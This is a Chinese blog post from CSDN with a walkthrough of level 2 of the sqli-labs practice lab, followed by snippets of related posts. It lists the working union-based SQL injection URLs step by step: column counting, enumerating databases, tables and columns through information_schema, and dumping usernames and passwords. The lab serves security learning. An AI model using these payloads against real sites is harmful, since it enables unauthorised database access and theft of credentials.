sqli - labs - 2

已于 2022-07-06 14:59:09 修改
阅读量226 收藏
点赞数 3
CC 4.0 BY-SA版权
文章标签: sql
于 2022-06-30 15:12:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62102000/article/details/125539374

Less-2 GET-Error based- Intiger based

在网址后面加上id=1出现用户名

在后面加上单引号发现报错,然后再加注释依然报错

http://192.168.167.32/sqli2/Less-2/?id=1 and 1=1 显示正常

http://192.168.167.32/sqli2/Less-2/?id=1 and 1=2 显示错误

判断为数字型注入

那么我们就可以用 order by语句逐步判断其表格有几列。

http://192.168.167.32/sqli2/Less-2/?id=1 order by 3 显示正常,说明有3列

 然后用判断其第几列有回显

http://192.168.167.32/sqli2/Less-2/?id=-1 union select 1,2,3

然后发现2,3,列有回显就可以爆出数据库,列,以及用户和密码;

爆出数据库http://192.168.167.32/sqli2/Less-2/?id=-1 union select 1,2,database() 可以查看其数据库名字  

 知道数据库名字以后可以查看所有数据库

http://192.168.167.32/sqli2/Less-2/?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata

查看当前数据库中所有表

 http://192.168.167.32/sqli2/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'

 查看user表中字段

 http://192.168.167.32/sqli2/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='security'

查看用户名和密码

http://192.168.167.32/sqli2/Less-2/?id=-1 union select 1,group_concat(concat_ws(':',username,password)) ,3 from users --+

Less-2完成 

呼呼个个
关注
Sqli-labs靶场第2关详解[Sqli-labs-less-2]
m0_73615178的博客
02-19 795
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()
sqli-labs-2
m0_63190830的博客
07-08 227
sqli基础题
sqli-labs2
jimggg的博客
03-17 347
一上来一顿单引号,双引号,单括号,双括号or and测试,都不行,拿sqlmap跑一下子 唉,大意了不是,最简单的数字型注入,开整 http://192.168.1.21/sqli-labs-master/Less-2/?id=1 order by 3–+ 正常显示,列查询3,接着暴库,这题我就不上这么多图了,偷懒!!! http://192.168.1.21/sqli-labs...
SQLI-LABS(二)
weixin_52398420的博客
11-26 336
SQLI-LABS(二) 前四关流程: 1、判断是否存在sql注入漏洞 2、使用order by 查看列数 3、使用联合查询判断回显位置 4、在回显位置处注入sql语句进行查询 **我们可以在sql文件中每一关文件中的index.php中写入代码 echo $sql; echo “< br >”; 以方便做题时查看sql语句; ** Less-1: ** 1、判断:?id=1’ 在这里插入图片描述 出现报错,证明存在sql漏洞,其中 报错信息 为’‘1’’ LIMIT 0,1’ at line
sqli-labs(2)
qq_61988806的博客
11-16 182
输入?id=1' --+显示格式错误?id=1" --+正常 测试?id=1“ and sleep(5) --+ 发现并没有成功?id=1') --+显示格式错误继续尝试?id=1')) --+ 显示正常 测试?id=1“ and sleep(5) --+ 发现sleep执行对于语句闭合的尝试主要从 ' " ()来测试报错语句尝试发现不回显报错信息只会出现语法错误的信息发现存在布尔注入布尔注入即可以根据返回页面判断条件真假的注入通过length知道了数据库长度为8这里写一个布尔盲注脚本。
网络安全 - Web 安全靶场 - sqli-labs-php7.zip
10-13
sqli-labs-php7.zip资源描述 sqli-labs-php7.zip是一个专注于SQL注入学习的资源包,特别适用于PHP 7.3及以上版本的环境。它提供了一个全面的练习平台,帮助用户深入理解SQL注入攻击的原理,并提升相应的防御技巧。 ...
Sqli-labs-maste 靶场的下载, phpStudy 下载
09-13
"Sqli-labs-maste"是一个专门设计用来练习和提高SQL注入技术的靶场环境,它提供了各种不同难度级别的SQL注入漏洞供用户尝试解决,从而帮助学习者深入理解SQL注入的原理和防御技术。 与此同时,"phpStudy"是一个流行...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场
09-21
sqli-labs-master靶场是一个针对安全研究人员、开发者和网络安全爱好者的实践平台,特别设计用于学习和测试SQL注入攻击技术。SQL注入是一种常见的网络攻击手段,攻击者通过在应用程序的输入字段中注入恶意的SQL代码...
sqli-labs靶场
05-30
"sqli-labs靶场"是一个专门用于学习和测试SQL注入技术的平台,它提供了多种不同类型的SQL注入场景,帮助安全研究人员和开发人员了解并防御这种攻击。 在sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入...
sqli-labs(第二关)
最新发布
kun12343的博客
11-06 708
今天做第二关。
sqli-labs2
qq_54190167的博客
07-11 331
sqli-labs关卡练习第二关
sqli-labs关卡2(基于get提交的数字型注入)通关思路
zyh1588的博客
10-21 399
从前有一个名字叫小白的人类,踏入sqli-labs靶场第二关后一去不复返......
SQLI-LABS(二)(1~4)
weixin_51075988的博客
11-24 407
SQLI-LABS(二) 前三关流程: 1、判断是否存在sql注入漏洞 2、使用order by 查看列数 3、使用联合查询判断回显位置 4、在回显位置处注入sql语句进行查询 **我们可以在sql文件中每一关文件中的index.php中写入代码 echo $sql; echo “< br >”; 以方便做题时查看sql语句; 第一关: 1、判断:?id=1’ 2、列数:?id=1’ order by x–+ (其中x输入数字代表哪一列,是用二分法缩小范围,x之后是两个减号与加号,代表注
sqli-labs(Page 2
Lorezon的博客
04-12 340
Less-21
SQL注入之sqli-labs(二)
m0_60716947的博客
04-10 2300
目录 (一)补充知识 (二)第五关至第七关(持续更新中) (1)第五关(布尔盲注) (一)补充知识 length() 函数:length(database())=8 看数据库名字有几位 left() 函数:left(database(),1)='s' left(a,b) 从左侧截取a的前b位,正确则返回1,错误则返回0 regexp 函数:select user() regexp 'r' 从左往右匹配,正确为1,错误为0。user() 的结果为 root,无论regex
sqli-labs第二关
yuqnqi的博客
05-06 1900
sqli-labs第二关
学习sqli-labs2
pmlib的博客
10-14 75
第二关与第一关差不多,只不过他把变量当成整体了。然后可以发现不需要写'也可以sql注入。然后按照第一关的流程来进行注入就可以了。
sqlilabs-2 (闯关记录)
qq_52642385的博客
04-23 109
Sqlilabs-2: ①:经过简单测试,发现为整数型注入,and 1=1 / and 1=2 /’and 1=1--+ /”等 ②:进行order by 爆解字段 ③:进行信息搜集工作 ④:进行构造payload,开始注入 ⑤:拿到相应的数据
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值